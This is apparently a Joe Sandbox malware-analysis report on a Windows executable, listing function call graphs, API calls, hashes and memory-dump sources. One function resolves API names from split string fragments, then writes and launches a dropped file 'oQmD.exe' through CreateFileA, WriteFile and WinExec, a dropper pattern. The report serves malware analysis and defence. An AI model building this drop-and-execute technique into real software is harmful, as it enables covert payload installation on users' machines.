17244->17241 17246 9583f3 __Xtime_get_ticks GetSystemTimePreciseAsFileTime GetSystemTimeAsFileTime 17245->17246 17247 957fb5 17246->17247 17247->17244 17249 956362 __EH_prolog3_GS 17248->17249 17258 9521cb 17249->17258 17254 9547df std::_Throw_Cpp_error 41 API calls 17255 956393 17254->17255 17273 9587b3 17255->17273 17259 9521e8 _strlen 17258->17259 17276 951653 17259->17276 17261 9521f5 17262 952550 17261->17262 17283 952197 17262->17283 17269 9547df std::_Throw_Cpp_error 41 API calls 17270 952593 17269->17270 17271 958791 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 17270->17271 17272 9525b2 17271->17272 17272->17254 17274 958791 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 17273->17274 17275 9587bd 17274->17275 17275->17275 17277 9516be 17276->17277 17281 951664 std::_Throw_Cpp_error 17276->17281 17278 954975 std::_Throw_Cpp_error 43 API calls 17277->17278 17280 9516c3 17278->17280 17279 95166b std::_Throw_Cpp_error 17279->17261 17281->17279 17282 951578 std::_Throw_Cpp_error 43 API calls 17281->17282 17282->17279 17284 9521b7 17283->17284 17285 9516c4 std::_Throw_Cpp_error 43 API calls 17284->17285 17286 9521c4 17285->17286 17287 953fea 17286->17287 17288 954004 _strlen 17287->17288 17289 95401b 17287->17289 17290 9549c4 std::_Throw_Cpp_error 43 API calls 17288->17290 17291 9549c4 std::_Throw_Cpp_error 43 API calls 17289->17291 17290->17289 17292 954042 17291->17292 17293 9547df std::_Throw_Cpp_error 41 API calls 17292->17293 17294 95404a std::_Throw_Cpp_error 17293->17294 17295 9547df std::_Throw_Cpp_error 41 API calls 17294->17295 17296 95405d 17295->17296 17297 958791 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 17296->17297 17298 952580 17297->17298 17299 952897 17298->17299 17300 9528a4 17299->17300 17301 95275f std::exception::exception 42 API calls 17300->17301 17302 95258b 17301->17302 17302->17269 17310 956212 SleepConditionVariableSRW 17303->17310 17305 956204 17306 956208 17305->17306 17307 95d05b CallUnexpected 41 API calls 17305->17307 17309 95626e GetCurrentThreadId 17306->17309 17308 956211 17307->17308 17309->17214 17310->17305 17314 955fa3 17311->17314 17315 955fbe __InternalCxxFrameHandler 17314->17315 17321 955fd4 17314->17321 17318 9599c2 Concurrency::cancel_current_task RaiseException 17315->17318 17316 956045 RaiseException 17317 958791 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 17316->17317 17319 9551e7 17317->17319 17318->17321 17320 956067 17322 95d05b CallUnexpected 41 API calls 17320->17322 17321->17316 17321->17320 17324 956025 __alloca_probe_16 17321->17324 17323 95606c 17322->17323 17324->17316 17326 95275f std::exception::exception 42 API calls 17325->17326 17327 95285b 17326->17327 17327->17191 17551->16119

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 0 9ff044-9ff074 GetPEB 1 9ff077-9ff09a 0->1 2 9ff09d-9ff0a0 1->2 3 9ff1ee-9ff22b CreateFileA 2->3 4 9ff0a6-9ff0bc 2->4 24 9ff22d-9ff230 3->24 25 9ff265-9ff269 3->25 5 9ff0be-9ff0c5 4->5 6 9ff110-9ff116 4->6 5->6 10 9ff0c7-9ff0ce 5->10 8 9ff129-9ff12f 6->8 9 9ff118-9ff11f 6->9 12 9ff148-9ff14e 8->12 13 9ff131-9ff138 8->13 9->8 11 9ff121-9ff124 9->11 10->6 14 9ff0d0-9ff0d7 10->14 16 9ff1bb-9ff1c0 11->16 18 9ff167-9ff16f 12->18 19 9ff150-9ff157 12->19 13->12 17 9ff13a-9ff141 13->17 14->6 20 9ff0d9-9ff0dd 14->20 27 9ff1c2-9ff1c5 16->27 28 9ff1e0-9ff1e9 16->28 17->12 26 9ff143-9ff146 17->26 21 9ff188-9ff18e 18->21 22 9ff171-9ff178 18->22 19->18 29 9ff159-9ff160 19->29 20->6 23 9ff0df-9ff0e3 20->23 32 9ff1a7-9ff1ad 21->32 33 9ff190-9ff197 21->33 22->21 30 9ff17a-9ff181 22->30 23->16 31 9ff0e9-9ff10b 23->31 34 9ff232-9ff238 24->34 26->16 27->28 35 9ff1c7-9ff1ca 27->35 28->2 29->18 36 9ff162-9ff165 29->36 30->21 37 9ff183-9ff186 30->37 31->1 32->16 39 9ff1af-9ff1b6 32->39 33->32 38 9ff199-9ff1a0 33->38 40 9ff23a-9ff242 34->40 41 9ff246-9ff252 WriteFile 34->41 35->28 42 9ff1cc-9ff1cf 35->42 36->16 37->16 38->32 44 9ff1a2-9ff1a5 38->44 39->16 45 9ff1b8 39->45 40->34 46 9ff244 40->46 47 9ff255-9ff262 FindCloseChangeNotification WinExec 41->47 42->28 48 9ff1d1-9ff1d4 42->48 44->16 45->16 46->47 47->25 48->28 49 9ff1d6-9ff1d9 48->49 49->28 50 9ff1db-9ff1de 49->50 50->3 50->28
                          APIs
                          • CreateFileA.KERNELBASE(?,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 009FF223
                          • WriteFile.KERNELBASE(00000000,FFF5985A,00003E00,?,00000000), ref: 009FF252
                          • FindCloseChangeNotification.KERNELBASE(00000000), ref: 009FF256
                          • WinExec.KERNEL32(?,00000005), ref: 009FF262
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1832842313.00000000009FF000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                          • Associated: 00000000.00000002.1832534038.0000000000950000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832558573.0000000000951000.00000020.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832599610.0000000000970000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832624318.000000000097B000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832685375.00000000009F8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832706458.00000000009F9000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832726530.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832778238.00000000009FB000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832802341.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832858390.0000000000A00000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832858390.0000000000A04000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_950000_1hdqYXYJkr.jbxd
                          Similarity
                          • API ID: File$ChangeCloseCreateExecFindNotificationWrite
                          • String ID: .dll$Clos$Crea$GetM$GetT$Kern$WinE$Writ$athA$catA$dleA$el32$lstr$oQmD.exe$odul
                          • API String ID: 2234911746-2449759314
                          • Opcode ID: 3a21b9a04b60c029bfa5898a0c68380fe995c34265fb90ba904242a9be045170
                          • Instruction ID: 9288f5f84124e37a0c429c9c19ddedc641de2a24f1cf795c7b883634ec9ac283
                          • Opcode Fuzzy Hash: 3a21b9a04b60c029bfa5898a0c68380fe995c34265fb90ba904242a9be045170
                          • Instruction Fuzzy Hash: AF613A75E05219DBCF24CF94C8A4ABDF7B8BF44315F2585BAD605AB201C3749E81CB91

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 798 96bac7-96bad4 799 96bada-96badf 798->799 800 96bb78-96bb91 GetLocaleInfoW 798->800 799->800 803 96bae5-96baea 799->803 801 96bb97-96bb9c 800->801 802 96bb93-96bb95 800->802 804 96bba4-96bba7 801->804 805 96bb9e GetACP 801->805 802->804 806 96baec-96baf2 803->806 805->804 807 96baf4-96baf7 806->807 808 96bb12-96bb14 806->808 810 96bb0e-96bb10 807->810 811 96baf9-96bb01 807->811 809 96bb17-96bb19 808->809 809->800 813 96bb1b-96bb20 809->813 810->809 811->808 812 96bb03-96bb0c 811->812 812->806 812->810 814 96bb22-96bb28 813->814 815 96bb46-96bb48 814->815 816 96bb2a-96bb2d 814->816 818 96bb4b-96bb4d 815->818 817 96bb2f-96bb37 816->817 816->818 817->815 819 96bb39-96bb42 817->819 820 96bb6f-96bb76 call 95da6f 818->820 821 96bb4f-96bb68 GetLocaleInfoW 818->821 819->814 822 96bb44 819->822 820->804 821->802 823 96bb6a-96bb6d 821->823 822->818 823->804
                          APIs
                          • GetLocaleInfoW.KERNEL32(00000000,2000000B,0096BDE5,00000002,00000000,?,?,?,0096BDE5,?,00000000), ref: 0096BB60
                          • GetLocaleInfoW.KERNEL32(00000000,20001004,0096BDE5,00000002,00000000,?,?,?,0096BDE5,?,00000000), ref: 0096BB89
                          • GetACP.KERNEL32(?,?,0096BDE5,?,00000000), ref: 0096BB9E
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1832558573.0000000000951000.00000020.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                          • Associated: 00000000.00000002.1832534038.0000000000950000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832599610.0000000000970000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832624318.000000000097B000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832685375.00000000009F8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832706458.00000000009F9000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832726530.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832778238.00000000009FB000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832802341.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832842313.00000000009FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832858390.0000000000A00000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832858390.0000000000A04000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_950000_1hdqYXYJkr.jbxd
                          Similarity
                          • API ID: InfoLocale
                          • String ID: ACP$OCP
                          • API String ID: 2299586839-711371036
                          • Opcode ID: 43551ec02b640017b934d4bbe613df2ba6b4dd46b4af1e814ac9b4110527fe18
                          • Instruction ID: 766658cfd1c9a494a08a1e1935b19adff5919f5d770ab4c09448776cd2992309
                          • Opcode Fuzzy Hash: 43551ec02b640017b934d4bbe613df2ba6b4dd46b4af1e814ac9b4110527fe18
                          • Instruction Fuzzy Hash: FC215E32B14101EADB348F75C941BABB3AAEF95B64B568464E90AD711CF732DEC0D350
                          APIs
                            • Part of subcall function 00962E60: GetLastError.KERNEL32(?,00000008,0096345F,?,?,00953CB9,009FA41C,?,?,009529CB,?,?,?,?,?,0095139A), ref: 00962E64
                            • Part of subcall function 00962E60: SetLastError.KERNEL32(00000000), ref: 00962F06
                          • GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 0096BDA8
                          • IsValidCodePage.KERNEL32(00000000), ref: 0096BDF1
                          • IsValidLocale.KERNEL32(?,00000001), ref: 0096BE00
                          • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 0096BE48
                          • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 0096BE67
                          Memory Dump Source
                          • Source File: 00000000.00000002.1832558573.0000000000951000.00000020.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                          • Associated: 00000000.00000002.1832534038.0000000000950000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832599610.0000000000970000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832624318.000000000097B000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832685375.00000000009F8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832706458.00000000009F9000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832726530.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832778238.00000000009FB000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832802341.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832842313.00000000009FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832858390.0000000000A00000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832858390.0000000000A04000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_950000_1hdqYXYJkr.jbxd
                          Similarity
                          • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                          • String ID:
                          • API String ID: 415426439-0
                          • Opcode ID: a568b38b1c1d8d4404fed603ed01913df763d0783f53afef698676260794d117
                          • Instruction ID: 14a3c2e0c4a99b4cccbde9e3c5f12c516f4447352e3704c5ff5beda0e78fcef2
                          • Opcode Fuzzy Hash: a568b38b1c1d8d4404fed603ed01913df763d0783f53afef698676260794d117
                          • Instruction Fuzzy Hash: 2C515CB2A00619ABDB20DFA5CC51BFA77BCBF44700F184469E954EB191FB709A80DB61
                          APIs
                          • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000), ref: 009686D9
                          • FindNextFileW.KERNEL32(00000000,?), ref: 009687CD
                          • FindClose.KERNEL32(00000000), ref: 0096880C
                          • FindClose.KERNEL32(00000000), ref: 0096883F
                          Memory Dump Source
                          • Source File: 00000000.00000002.1832558573.0000000000951000.00000020.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                          • Associated: 00000000.00000002.1832534038.0000000000950000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832599610.0000000000970000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832624318.000000000097B000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832685375.00000000009F8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832706458.00000000009F9000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832726530.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832778238.00000000009FB000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832802341.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832842313.00000000009FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832858390.0000000000A00000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832858390.0000000000A04000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_950000_1hdqYXYJkr.jbxd
                          Similarity
                          • API ID: Find$CloseFile$FirstNext
                          • String ID:
                          • API String ID: 1164774033-0
                          • Opcode ID: ab7ca6360f894076f325a54e97b5b83332b26bc0cea5d584799a39f0808ad2cb
                          • Instruction ID: cc9ea06a63830f87623ae52ee333d9b55b14928f34aff84e6bbd191a8677453b
                          • Opcode Fuzzy Hash: ab7ca6360f894076f325a54e97b5b83332b26bc0cea5d584799a39f0808ad2cb
                          • Instruction Fuzzy Hash: BE71D3B19051589FDF20EF24CC99BAFBBB9AF4A300F6442D9E04DA7211EE314E859F50
                          APIs
                          • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 00958E0A
                          • IsDebuggerPresent.KERNEL32 ref: 00958ED6
                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00958EEF
                          • UnhandledExceptionFilter.KERNEL32(?), ref: 00958EF9
                          Memory Dump Source
                          • Source File: 00000000.00000002.1832558573.0000000000951000.00000020.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                          • Associated: 00000000.00000002.1832534038.0000000000950000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832599610.0000000000970000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832624318.000000000097B000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832685375.00000000009F8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832706458.00000000009F9000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832726530.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832778238.00000000009FB000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832802341.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832842313.00000000009FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832858390.0000000000A00000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832858390.0000000000A04000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_950000_1hdqYXYJkr.jbxd
                          Similarity
                          • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                          • String ID:
                          • API String ID: 254469556-0
                          • Opcode ID: 745cea4cf4efabc50c022a9bc5433ed08f310293e8153273fd992b74f89ea7bd
                          • Instruction ID: 364d042499e1159cc03fb60fad5498ba30a877a629e4b32ba985ab38859b9119
                          • Opcode Fuzzy Hash: 745cea4cf4efabc50c022a9bc5433ed08f310293e8153273fd992b74f89ea7bd
                          • Instruction Fuzzy Hash: 83310C75D05218DBDF20DF65D8497CDBBB8BF48305F10419AE80DA7250EB719A84DF45
                          APIs
                            • Part of subcall function 00962E60: GetLastError.KERNEL32(?,00000008,0096345F,?,?,00953CB9,009FA41C,?,?,009529CB,?,?,?,?,?,0095139A), ref: 00962E64
                            • Part of subcall function 00962E60: SetLastError.KERNEL32(00000000), ref: 00962F06
                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0096B79F
                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0096B7E9
                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0096B8AF
                          Memory Dump Source
                          • Source File: 00000000.00000002.1832558573.0000000000951000.00000020.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                          • Associated: 00000000.00000002.1832534038.0000000000950000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832599610.0000000000970000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832624318.000000000097B000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832685375.00000000009F8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832706458.00000000009F9000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832726530.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832778238.00000000009FB000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832802341.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832842313.00000000009FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832858390.0000000000A00000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832858390.0000000000A04000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_950000_1hdqYXYJkr.jbxd
                          Similarity
                          • API ID: InfoLocale$ErrorLast
                          • String ID:
                          • API String ID: 661929714-0
                          • Opcode ID: 784a8c089200709813c52d829062179227df89926e31e748e7cef41a05760b33
                          • Instruction ID: 0acd7a91db492f201ab74c17e6efd8112b48e2fe48c0e7e6b9425575dcd02b88
                          • Opcode Fuzzy Hash: 784a8c089200709813c52d829062179227df89926e31e748e7cef41a05760b33
                          • Instruction Fuzzy Hash: 14617B729442179FDB289F28CD82BAAB7ACEF54304F10417AEA05C7685FB38D9D1DB50
                          APIs
                          • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 0095CEDB
                          • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 0095CEE5
                          • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 0095CEF2
                          Memory Dump Source
                          • Source File: 00000000.00000002.1832558573.0000000000951000.00000020.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                          • Associated: 00000000.00000002.1832534038.0000000000950000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832599610.0000000000970000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832624318.000000000097B000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832685375.00000000009F8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832706458.00000000009F9000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832726530.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832778238.00000000009FB000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832802341.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832842313.00000000009FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832858390.0000000000A00000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832858390.0000000000A04000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_950000_1hdqYXYJkr.jbxd
                          Similarity
                          • API ID: ExceptionFilterUnhandled$DebuggerPresent
                          • String ID:
                          • API String ID: 3906539128-0
                          • Opcode ID: 76eff780166692c4b03e5339bc90d0987c63d1da54c4dccb8c7b8d336c5ff903
                          • Instruction ID: 98f8a24c66752bc3f348a8d246fc9478fc3feb705ca001c067e062bd6416a6c8
                          • Opcode Fuzzy Hash: 76eff780166692c4b03e5339bc90d0987c63d1da54c4dccb8c7b8d336c5ff903
                          • Instruction Fuzzy Hash: 4631C4B5911218ABCB21DF65D88978DBBB8BF48311F5041DAE80DA7250EB709F85CF44
                          APIs
                          • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,?,?,?,009677C5,?,?,?,?,?,?,00000000), ref: 009679F7
                          Memory Dump Source
                          • Source File: 00000000.00000002.1832558573.0000000000951000.00000020.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                          • Associated: 00000000.00000002.1832534038.0000000000950000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832599610.0000000000970000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832624318.000000000097B000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832685375.00000000009F8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832706458.00000000009F9000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832726530.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832778238.00000000009FB000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832802341.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832842313.00000000009FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832858390.0000000000A00000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832858390.0000000000A04000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_950000_1hdqYXYJkr.jbxd
                          Similarity
                          • API ID: ExceptionRaise
                          • String ID:
                          • API String ID: 3997070919-0
                          • Opcode ID: 82d32ac1e9007d2d3bc5199f8bb280efbabc7c7f5e60fa7d5c143e61bf0079b2
                          • Instruction ID: b4b97b5eba39ca24df6c23aa0f767d4611cf0ee9f5a9d1466a3a0a361da2e18c
                          • Opcode Fuzzy Hash: 82d32ac1e9007d2d3bc5199f8bb280efbabc7c7f5e60fa7d5c143e61bf0079b2
                          • Instruction Fuzzy Hash: 9EB14C31624609DFD715CF68C48AB69BBE0FF45368F258658E899CF2A1C335EE91CB40
                          APIs
                          • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00958C0B
                          Memory Dump Source
                          • Source File: 00000000.00000002.1832558573.0000000000951000.00000020.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                          • Associated: 00000000.00000002.1832534038.0000000000950000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832599610.0000000000970000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832624318.000000000097B000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832685375.00000000009F8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832706458.00000000009F9000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832726530.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832778238.00000000009FB000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832802341.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832842313.00000000009FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832858390.0000000000A00000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832858390.0000000000A04000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_950000_1hdqYXYJkr.jbxd
                          Similarity
                          • API ID: FeaturePresentProcessor
                          • String ID:
                          • API String ID: 2325560087-0
                          • Opcode ID: 79bc610eff78452eec9a6f763aedc2885af4ec457823dd1e36f4214368011e37
                          • Instruction ID: 384a37ad9c6eda653dcda3cf19437fd0de3084733a069ce9978604bc715ca82a
                          • Opcode Fuzzy Hash: 79bc610eff78452eec9a6f763aedc2885af4ec457823dd1e36f4214368011e37
                          • Instruction Fuzzy Hash: 38519EB1A252058BDB18CF5AD8857BBB7F8FB48312F24846AC849FB290DB74D944CF50
                          APIs
                            • Part of subcall function 00962E60: GetLastError.KERNEL32(?,00000008,0096345F,?,?,00953CB9,009FA41C,?,?,009529CB,?,?,?,?,?,0095139A), ref: 00962E64
                            • Part of subcall function 00962E60: SetLastError.KERNEL32(00000000), ref: 00962F06
                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0096B9F2
                          Memory Dump Source
                          • Source File: 00000000.00000002.1832558573.0000000000951000.00000020.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                          • Associated: 00000000.00000002.1832534038.0000000000950000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832599610.0000000000970000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832624318.000000000097B000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832685375.00000000009F8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832706458.00000000009F9000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832726530.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832778238.00000000009FB000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832802341.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832842313.00000000009FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832858390.0000000000A00000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832858390.0000000000A04000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_950000_1hdqYXYJkr.jbxd
                          Similarity
                          • API ID: ErrorLast$InfoLocale
                          • String ID:
                          • API String ID: 3736152602-0
                          • Opcode ID: 72c39925b97781c35e94217243f4de7dfe8b3b39ac7712c0045c18c583fb8349
                          • Instruction ID: d317ac218849fa6d26b8a31a68d4fdd6a25431d4e4999e757f15cd4a0a2bb9f0
                          • Opcode Fuzzy Hash: 72c39925b97781c35e94217243f4de7dfe8b3b39ac7712c0045c18c583fb8349
